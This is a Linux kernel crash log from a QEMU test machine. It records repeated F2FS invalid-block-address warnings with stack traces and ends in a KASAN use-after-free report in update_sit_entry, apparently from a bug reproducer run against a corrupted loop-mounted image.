[ 1428.841351] ---[ end trace b1cfe6aeee92e9a4 ]---
[ 1428.841357] F2FS-fs (loop0): invalid blkaddr: 196608, type: 5, run fsck to fix.
[ 1428.841621] WARNING: CPU: 0 PID: 2741 at fs/f2fs/f2fs.h:2685 f2fs_iget+0x1875/0x1a80
[ 1428.841623] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core configfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear 8139too qxl ttm crct10dif_pclmul drm_kms_helper crc32_pclmul ghash_clmulni_intel pcbc aesni_intel aes_x86_64 crypto_simd cryptd glue_helper syscopyarea sysfillrect sysimgblt fb_sys_fops drm 8139cp mii floppy pata_acpi
[ 1428.841694] CPU: 0 PID: 2741 Comm: a.out Tainted: G        W         4.17.0+ #1
[ 1428.841697] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.841702] RIP: 0010:f2fs_iget+0x1875/0x1a80
[ 1428.841703] Code: 8b 7d a8 4c 89 ff e8 ba 60 dc ff 49 8b 3f 41 b8 05 00 00 00 44 89 f1 48 c7 c2 c0 5a 57 a5 48 c7 c6 20 5b 57 a5 e8 db 59 01 00 <0f> 0b f0 41 80 4f 48 04 e9 5e f4 ff ff 0f 0b 4c 8b 7d b8 49 8d 7f 
[ 1428.841762] RSP: 0018:ffff8801ea2d7930 EFLAGS: 00010286
[ 1428.841767] RAX: 0000000000000000 RBX: ffff8801c9d25888 RCX: 0000000000000000
[ 1428.841770] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d45aefc
[ 1428.841774] RBP: ffff8801ea2d7a10 R08: ffffed003e743ebb R09: ffffed003e743ebb
[ 1428.841777] R10: 0000000000000001 R11: ffffed003e743eba R12: ffff880192483000
[ 1428.841780] R13: ffff8801939e5d80 R14: 0000000000030000 R15: ffff8801939e5d80
[ 1428.841785] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1428.841788] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1428.841791] CR2: 00007fb14306c030 CR3: 00000001ec9d4000 CR4: 00000000000006f0
[ 1428.841795] Call Trace:
[ 1428.841805]  ? f2fs_lookup+0x2e7/0x580
[ 1428.841809]  f2fs_lookup+0x2e7/0x580
[ 1428.841815]  ? __recover_dot_dentries+0x400/0x400
[ 1428.841821]  ? __recover_dot_dentries+0x400/0x400
[ 1428.841827]  path_openat+0x1b15/0x1fa0
[ 1428.841834]  ? vfs_unlink+0x250/0x250
[ 1428.841839]  ? save_stack+0x94/0xb0
[ 1428.841844]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.841849]  ? kmem_cache_alloc+0xc8/0x1e0
[ 1428.841854]  ? getname_flags+0x73/0x2b0
[ 1428.841859]  ? do_sys_open+0x144/0x2a0
[ 1428.841865]  ? do_syscall_64+0x73/0x160
[ 1428.841871]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.841878]  ? __alloc_pages_slowpath+0x1260/0x1260
[ 1428.841883]  ? policy_nodemask+0x1a/0x90
[ 1428.841887]  ? policy_node+0x56/0x70
[ 1428.841893]  ? __mod_node_page_state+0x22/0xa0
[ 1428.841900]  ? __handle_mm_fault+0x119a/0x1920
[ 1428.841906]  do_filp_open+0x12b/0x1d0
[ 1428.841911]  ? may_open_dev+0x50/0x50
[ 1428.841917]  ? getname_flags+0x73/0x2b0
[ 1428.841923]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.841927]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.841934]  ? __alloc_fd+0x1b0/0x250
[ 1428.841940]  ? do_sys_open+0x175/0x2a0
[ 1428.841946]  do_sys_open+0x175/0x2a0
[ 1428.841951]  ? filp_open+0x50/0x50
[ 1428.841958]  do_syscall_64+0x73/0x160
[ 1428.841965]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.841969] RIP: 0033:0x7fb14306c040
[ 1428.841970] Code: 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 83 3d 09 27 2d 00 00 75 10 b8 02 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 7e e0 01 00 48 89 04 24 
[ 1428.842029] RSP: 002b:00007ffc651d93b8 EFLAGS: 00000246 ORIG_RAX: 0000000000000002
[ 1428.842034] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fb14306c040
[ 1428.842037] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000002229080
[ 1428.842040] RBP: 00007ffc651d93f0 R08: 0000000002229010 R09: 0000000000000000
[ 1428.842043] R10: 000000000000069d R11: 0000000000000246 R12: 00000000004005c0
[ 1428.842047] R13: 00007ffc651d94f0 R14: 0000000000000000 R15: 0000000000000000
[ 1428.842051] ---[ end trace b1cfe6aeee92e9a5 ]---
[ 1428.842988] F2FS-fs (loop0): access invalid blkaddr:196608
[ 1428.843043] WARNING: CPU: 0 PID: 2741 at fs/f2fs/checkpoint.c:151 f2fs_is_valid_blkaddr+0x179/0x320
[ 1428.843044] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core configfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear 8139too qxl ttm crct10dif_pclmul drm_kms_helper crc32_pclmul ghash_clmulni_intel pcbc aesni_intel aes_x86_64 crypto_simd cryptd glue_helper syscopyarea sysfillrect sysimgblt fb_sys_fops drm 8139cp mii floppy pata_acpi
[ 1428.843131] CPU: 0 PID: 2741 Comm: a.out Tainted: G        W         4.17.0+ #1
[ 1428.843134] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.843140] RIP: 0010:f2fs_is_valid_blkaddr+0x179/0x320
[ 1428.843141] Code: 85 e5 fe ff ff 48 89 df 88 44 24 07 e8 20 4b da ff 48 8b 3b 44 89 e1 48 c7 c2 00 f9 57 a5 48 c7 c6 a0 f7 57 a5 e8 47 44 ff ff <0f> 0b 0f b6 44 24 07 e9 b4 fe ff ff 48 8d 7f 60 e8 f2 4a da ff 48 
[ 1428.843202] RSP: 0018:ffff8801ea2d7838 EFLAGS: 00010282
[ 1428.843212] RAX: 0000000000000000 RBX: ffff8801939e5d80 RCX: 0000000000000000
[ 1428.843216] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d45aedd
[ 1428.843219] RBP: 0000000000000005 R08: ffffed003e743ebb R09: ffffed003e743ebb
[ 1428.843222] R10: 0000000000000002 R11: ffffed003e743eba R12: 0000000000030000
[ 1428.843225] R13: ffff8801ee1be600 R14: 0000000000004000 R15: 0000000000003e00
[ 1428.843230] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1428.843233] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1428.843237] CR2: 00007fb14306c030 CR3: 00000001ec9d4000 CR4: 00000000000006f0
[ 1428.843242] Call Trace:
[ 1428.843255]  f2fs_allocate_data_block+0x664/0xc70
[ 1428.843264]  ? f2fs_get_node_info+0x14f/0x590
[ 1428.843270]  do_write_page+0xc8/0x150
[ 1428.843279]  f2fs_outplace_write_data+0xfe/0x210
[ 1428.843286]  ? f2fs_do_write_node_page+0x170/0x170
[ 1428.843296]  ? radix_tree_tag_clear+0xff/0x130
[ 1428.843304]  ? __mod_node_page_state+0x22/0xa0
[ 1428.843309]  ? inc_zone_page_state+0x54/0x100
[ 1428.843315]  ? __test_set_page_writeback+0x336/0x5d0
[ 1428.843324]  f2fs_convert_inline_page+0x407/0x6d0
[ 1428.843331]  ? f2fs_read_inline_data+0x3b0/0x3b0
[ 1428.843338]  ? __get_node_page+0x335/0x6b0
[ 1428.843344]  f2fs_convert_inline_inode+0x41b/0x500
[ 1428.843351]  ? f2fs_convert_inline_page+0x6d0/0x6d0
[ 1428.843358]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.843363]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.843372]  f2fs_file_mmap+0x79/0xc0
[ 1428.843380]  mmap_region+0x58b/0x880
[ 1428.843391]  ? arch_get_unmapped_area+0x370/0x370
[ 1428.843396]  do_mmap+0x55b/0x7a0
[ 1428.843403]  vm_mmap_pgoff+0x16f/0x1c0
[ 1428.843410]  ? vma_is_stack_for_current+0x50/0x50
[ 1428.843420]  ? __fsnotify_update_child_dentry_flags.part.1+0x160/0x160
[ 1428.843427]  ? do_sys_open+0x206/0x2a0
[ 1428.843434]  ? __fget+0xb4/0x100
[ 1428.843439]  ksys_mmap_pgoff+0x278/0x360
[ 1428.843445]  ? find_mergeable_anon_vma+0x50/0x50
[ 1428.843454]  do_syscall_64+0x73/0x160
[ 1428.843462]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.843467] RIP: 0033:0x7fb1430766ba
[ 1428.843468] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 
[ 1428.843528] RSP: 002b:00007ffc651d9388 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 1428.843533] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb1430766ba
[ 1428.843536] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 1428.843539] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[ 1428.843542] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[ 1428.843545] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[ 1428.843549] ---[ end trace b1cfe6aeee92e9a6 ]---
[ 1428.843611] F2FS-fs (loop0): invalid blkaddr: 196608, type: 5, run fsck to fix.
[ 1428.843845] WARNING: CPU: 0 PID: 2741 at fs/f2fs/f2fs.h:2685 f2fs_allocate_data_block+0xacb/0xc70
[ 1428.843846] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core configfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear 8139too qxl ttm crct10dif_pclmul drm_kms_helper crc32_pclmul ghash_clmulni_intel pcbc aesni_intel aes_x86_64 crypto_simd cryptd glue_helper syscopyarea sysfillrect sysimgblt fb_sys_fops drm 8139cp mii floppy pata_acpi
[ 1428.844237] CPU: 0 PID: 2741 Comm: a.out Tainted: G        W         4.17.0+ #1
[ 1428.844240] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.844247] RIP: 0010:f2fs_allocate_data_block+0xacb/0xc70
[ 1428.844248] Code: ff ff 48 89 df e8 45 62 d7 ff 48 8b 3b 8b 4c 24 08 41 b8 05 00 00 00 48 c7 c2 00 0a 58 a5 48 c7 c6 60 0a 58 a5 e8 65 5b fc ff <0f> 0b f0 80 4b 48 04 e9 95 fb ff ff 48 89 df e8 11 62 d7 ff 48 8b 
[ 1428.844307] RSP: 0018:ffff8801ea2d7878 EFLAGS: 00010286
[ 1428.844311] RAX: 0000000000000000 RBX: ffff8801939e5d80 RCX: 0000000000000000
[ 1428.844315] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d45aee5
[ 1428.844318] RBP: ffff8801939dc000 R08: ffffed003e744f21 R09: ffffed003e744f21
[ 1428.844321] R10: 0000000000000002 R11: ffffed003e744f20 R12: ffff8801ea2d7ad4
[ 1428.844324] R13: 0000000000000000 R14: ffff8801949d4000 R15: 0000000000000000
[ 1428.844329] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1428.844332] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1428.844335] CR2: 00007fb14306c030 CR3: 00000001ec9d4000 CR4: 00000000000006f0
[ 1428.844339] Call Trace:
[ 1428.844348]  ? f2fs_get_node_info+0x14f/0x590
[ 1428.844355]  do_write_page+0xc8/0x150
[ 1428.844363]  f2fs_outplace_write_data+0xfe/0x210
[ 1428.844370]  ? f2fs_do_write_node_page+0x170/0x170
[ 1428.844376]  ? radix_tree_tag_clear+0xff/0x130
[ 1428.844381]  ? __mod_node_page_state+0x22/0xa0
[ 1428.844386]  ? inc_zone_page_state+0x54/0x100
[ 1428.844391]  ? __test_set_page_writeback+0x336/0x5d0
[ 1428.844398]  f2fs_convert_inline_page+0x407/0x6d0
[ 1428.844405]  ? f2fs_read_inline_data+0x3b0/0x3b0
[ 1428.844429]  ? __get_node_page+0x335/0x6b0
[ 1428.844440]  f2fs_convert_inline_inode+0x41b/0x500
[ 1428.844460]  ? f2fs_convert_inline_page+0x6d0/0x6d0
[ 1428.844484]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.844500]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.844512]  f2fs_file_mmap+0x79/0xc0
[ 1428.844530]  mmap_region+0x58b/0x880
[ 1428.844544]  ? arch_get_unmapped_area+0x370/0x370
[ 1428.844566]  do_mmap+0x55b/0x7a0
[ 1428.844576]  vm_mmap_pgoff+0x16f/0x1c0
[ 1428.844586]  ? vma_is_stack_for_current+0x50/0x50
[ 1428.844616]  ? __fsnotify_update_child_dentry_flags.part.1+0x160/0x160
[ 1428.844632]  ? do_sys_open+0x206/0x2a0
[ 1428.844650]  ? __fget+0xb4/0x100
[ 1428.844673]  ksys_mmap_pgoff+0x278/0x360
[ 1428.844691]  ? find_mergeable_anon_vma+0x50/0x50
[ 1428.844712]  do_syscall_64+0x73/0x160
[ 1428.844736]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.844759] RIP: 0033:0x7fb1430766ba
[ 1428.844766] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 
[ 1428.844868] RSP: 002b:00007ffc651d9388 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 1428.844873] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb1430766ba
[ 1428.844876] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 1428.844878] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[ 1428.844881] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[ 1428.844884] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[ 1428.844888] ---[ end trace b1cfe6aeee92e9a7 ]---
[ 1428.844892] F2FS-fs (loop0): access invalid blkaddr:196608
[ 1428.844936] WARNING: CPU: 0 PID: 2741 at fs/f2fs/checkpoint.c:151 f2fs_is_valid_blkaddr+0x179/0x320
[ 1428.844937] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core configfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear 8139too qxl ttm crct10dif_pclmul drm_kms_helper crc32_pclmul ghash_clmulni_intel pcbc aesni_intel aes_x86_64 crypto_simd cryptd glue_helper syscopyarea sysfillrect sysimgblt fb_sys_fops drm 8139cp mii floppy pata_acpi
[ 1428.845058] CPU: 0 PID: 2741 Comm: a.out Tainted: G        W         4.17.0+ #1
[ 1428.845061] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.845066] RIP: 0010:f2fs_is_valid_blkaddr+0x179/0x320
[ 1428.845067] Code: 85 e5 fe ff ff 48 89 df 88 44 24 07 e8 20 4b da ff 48 8b 3b 44 89 e1 48 c7 c2 00 f9 57 a5 48 c7 c6 a0 f7 57 a5 e8 47 44 ff ff <0f> 0b 0f b6 44 24 07 e9 b4 fe ff ff 48 8d 7f 60 e8 f2 4a da ff 48 
[ 1428.845144] RSP: 0018:ffff8801ea2d77d8 EFLAGS: 00010282
[ 1428.845148] RAX: 0000000000000000 RBX: ffff8801939e5d80 RCX: 0000000000000000
[ 1428.845151] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d45aed1
[ 1428.845154] RBP: 0000000000000005 R08: ffffed003e743ebb R09: ffffed003e743ebb
[ 1428.845157] R10: 0000000000000002 R11: ffffed003e743eba R12: 0000000000030000
[ 1428.845160] R13: ffff8801ee1be600 R14: 0000000000004000 R15: 0000000000003e00
[ 1428.845165] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1428.845168] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1428.845171] CR2: 00007fb14306c030 CR3: 00000001ec9d4000 CR4: 00000000000006f0
[ 1428.845175] Call Trace:
[ 1428.845183]  update_sit_entry+0x431/0x7f0
[ 1428.845191]  f2fs_allocate_data_block+0x6db/0xc70
[ 1428.845199]  ? f2fs_get_node_info+0x14f/0x590
[ 1428.845205]  do_write_page+0xc8/0x150
[ 1428.845213]  f2fs_outplace_write_data+0xfe/0x210
[ 1428.845220]  ? f2fs_do_write_node_page+0x170/0x170
[ 1428.845226]  ? radix_tree_tag_clear+0xff/0x130
[ 1428.845231]  ? __mod_node_page_state+0x22/0xa0
[ 1428.845236]  ? inc_zone_page_state+0x54/0x100
[ 1428.845241]  ? __test_set_page_writeback+0x336/0x5d0
[ 1428.845248]  f2fs_convert_inline_page+0x407/0x6d0
[ 1428.845255]  ? f2fs_read_inline_data+0x3b0/0x3b0
[ 1428.845262]  ? __get_node_page+0x335/0x6b0
[ 1428.845270]  f2fs_convert_inline_inode+0x41b/0x500
[ 1428.845278]  ? f2fs_convert_inline_page+0x6d0/0x6d0
[ 1428.845283]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.845290]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.845296]  f2fs_file_mmap+0x79/0xc0
[ 1428.845303]  mmap_region+0x58b/0x880
[ 1428.845311]  ? arch_get_unmapped_area+0x370/0x370
[ 1428.845316]  do_mmap+0x55b/0x7a0
[ 1428.845322]  vm_mmap_pgoff+0x16f/0x1c0
[ 1428.845329]  ? vma_is_stack_for_current+0x50/0x50
[ 1428.845336]  ? __fsnotify_update_child_dentry_flags.part.1+0x160/0x160
[ 1428.845342]  ? do_sys_open+0x206/0x2a0
[ 1428.845347]  ? __fget+0xb4/0x100
[ 1428.845353]  ksys_mmap_pgoff+0x278/0x360
[ 1428.845359]  ? find_mergeable_anon_vma+0x50/0x50
[ 1428.845365]  do_syscall_64+0x73/0x160
[ 1428.845372]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.845376] RIP: 0033:0x7fb1430766ba
[ 1428.845377] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 
[ 1428.845439] RSP: 002b:00007ffc651d9388 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 1428.845444] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb1430766ba
[ 1428.845447] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 1428.845450] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[ 1428.845453] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[ 1428.845455] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[ 1428.845460] ---[ end trace b1cfe6aeee92e9a8 ]---
[ 1428.845464] F2FS-fs (loop0): invalid blkaddr: 196608, type: 5, run fsck to fix.
[ 1428.845698] WARNING: CPU: 0 PID: 2741 at fs/f2fs/f2fs.h:2685 update_sit_entry+0x6dc/0x7f0
[ 1428.845699] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core configfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear 8139too qxl ttm crct10dif_pclmul drm_kms_helper crc32_pclmul ghash_clmulni_intel pcbc aesni_intel aes_x86_64 crypto_simd cryptd glue_helper syscopyarea sysfillrect sysimgblt fb_sys_fops drm 8139cp mii floppy pata_acpi
[ 1428.845769] CPU: 0 PID: 2741 Comm: a.out Tainted: G        W         4.17.0+ #1
[ 1428.845772] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.845778] RIP: 0010:update_sit_entry+0x6dc/0x7f0
[ 1428.845779] Code: ff ff 48 89 ef e8 b4 ab d7 ff 48 8b 7d 00 41 b8 05 00 00 00 44 89 f9 48 c7 c2 00 0a 58 a5 48 c7 c6 60 0a 58 a5 e8 d4 a4 fc ff <0f> 0b f0 80 4d 48 04 e9 51 fd ff ff 0f b7 53 02 8d 4a 01 66 81 e2 
[ 1428.845845] RSP: 0018:ffff8801ea2d7818 EFLAGS: 00010286
[ 1428.845850] RAX: 0000000000000000 RBX: ffff8801939e5d80 RCX: 0000000000000000
[ 1428.845853] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d45aed9
[ 1428.845856] RBP: ffff8801939e5d80 R08: ffffed003e743ebb R09: ffffed003e743ebb
[ 1428.845860] R10: 0000000000000002 R11: ffffed003e743eba R12: ffff8801ea2d7ad4
[ 1428.845863] R13: 00000000ffffffff R14: 0000000000000178 R15: 0000000000030000
[ 1428.845867] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1428.845870] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1428.845874] CR2: 00007fb14306c030 CR3: 00000001ec9d4000 CR4: 00000000000006f0
[ 1428.845878] Call Trace:
[ 1428.845887]  f2fs_allocate_data_block+0x6db/0xc70
[ 1428.845894]  ? f2fs_get_node_info+0x14f/0x590
[ 1428.845901]  do_write_page+0xc8/0x150
[ 1428.845909]  f2fs_outplace_write_data+0xfe/0x210
[ 1428.845916]  ? f2fs_do_write_node_page+0x170/0x170
[ 1428.845922]  ? radix_tree_tag_clear+0xff/0x130
[ 1428.845927]  ? __mod_node_page_state+0x22/0xa0
[ 1428.845932]  ? inc_zone_page_state+0x54/0x100
[ 1428.845937]  ? __test_set_page_writeback+0x336/0x5d0
[ 1428.845945]  f2fs_convert_inline_page+0x407/0x6d0
[ 1428.845952]  ? f2fs_read_inline_data+0x3b0/0x3b0
[ 1428.845958]  ? __get_node_page+0x335/0x6b0
[ 1428.845964]  f2fs_convert_inline_inode+0x41b/0x500
[ 1428.845971]  ? f2fs_convert_inline_page+0x6d0/0x6d0
[ 1428.845977]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.845982]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.845988]  f2fs_file_mmap+0x79/0xc0
[ 1428.845994]  mmap_region+0x58b/0x880
[ 1428.846001]  ? arch_get_unmapped_area+0x370/0x370
[ 1428.846006]  do_mmap+0x55b/0x7a0
[ 1428.846013]  vm_mmap_pgoff+0x16f/0x1c0
[ 1428.846019]  ? vma_is_stack_for_current+0x50/0x50
[ 1428.846027]  ? __fsnotify_update_child_dentry_flags.part.1+0x160/0x160
[ 1428.846033]  ? do_sys_open+0x206/0x2a0
[ 1428.846038]  ? __fget+0xb4/0x100
[ 1428.846044]  ksys_mmap_pgoff+0x278/0x360
[ 1428.846049]  ? find_mergeable_anon_vma+0x50/0x50
[ 1428.846056]  do_syscall_64+0x73/0x160
[ 1428.846063]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.846067] RIP: 0033:0x7fb1430766ba
[ 1428.846068] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 
[ 1428.846127] RSP: 002b:00007ffc651d9388 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 1428.846132] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb1430766ba
[ 1428.846135] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 1428.846137] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[ 1428.846140] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[ 1428.846143] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[ 1428.846148] ---[ end trace b1cfe6aeee92e9a9 ]---
[ 1428.846150] ==================================================================
[ 1428.846352] BUG: KASAN: use-after-free in update_sit_entry+0x80/0x7f0
[ 1428.846618] Read of size 4 at addr ffff880194483540 by task a.out/2741

[ 1428.846855] CPU: 0 PID: 2741 Comm: a.out Tainted: G        W         4.17.0+ #1
[ 1428.846858] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.846860] Call Trace:
[ 1428.846868]  dump_stack+0x71/0xab
[ 1428.846875]  print_address_description+0x6b/0x290
[ 1428.846881]  kasan_report+0x28e/0x390
[ 1428.846888]  ? update_sit_entry+0x80/0x7f0
[ 1428.846898]  update_sit_entry+0x80/0x7f0
[ 1428.846906]  f2fs_allocate_data_block+0x6db/0xc70
[ 1428.846914]  ? f2fs_get_node_info+0x14f/0x590
[ 1428.846920]  do_write_page+0xc8/0x150
[ 1428.846928]  f2fs_outplace_write_data+0xfe/0x210
[ 1428.846935]  ? f2fs_do_write_node_page+0x170/0x170
[ 1428.846941]  ? radix_tree_tag_clear+0xff/0x130
[ 1428.846946]  ? __mod_node_page_state+0x22/0xa0
[ 1428.846951]  ? inc_zone_page_state+0x54/0x100
[ 1428.846956]  ? __test_set_page_writeback+0x336/0x5d0
[ 1428.846964]  f2fs_convert_inline_page+0x407/0x6d0
[ 1428.846971]  ? f2fs_read_inline_data+0x3b0/0x3b0
[ 1428.846978]  ? __get_node_page+0x335/0x6b0
[ 1428.846987]  f2fs_convert_inline_inode+0x41b/0x500
[ 1428.846994]  ? f2fs_convert_inline_page+0x6d0/0x6d0
[ 1428.847000]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.847005]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.847024]  f2fs_file_mmap+0x79/0xc0
[ 1428.847029]  mmap_region+0x58b/0x880
[ 1428.847037]  ? arch_get_unmapped_area+0x370/0x370
[ 1428.847042]  do_mmap+0x55b/0x7a0
[ 1428.847048]  vm_mmap_pgoff+0x16f/0x1c0
[ 1428.847055]  ? vma_is_stack_for_current+0x50/0x50
[ 1428.847062]  ? __fsnotify_update_child_dentry_flags.part.1+0x160/0x160
[ 1428.847068]  ? do_sys_open+0x206/0x2a0
[ 1428.847073]  ? __fget+0xb4/0x100
[ 1428.847079]  ksys_mmap_pgoff+0x278/0x360
[ 1428.847085]  ? find_mergeable_anon_vma+0x50/0x50
[ 1428.847091]  do_syscall_64+0x73/0x160
[ 1428.847098]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.847102] RIP: 0033:0x7fb1430766ba
[ 1428.847103] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 
[ 1428.847162] RSP: 002b:00007ffc651d9388 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 1428.847167] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb1430766ba
[ 1428.847170] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 1428.847173] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
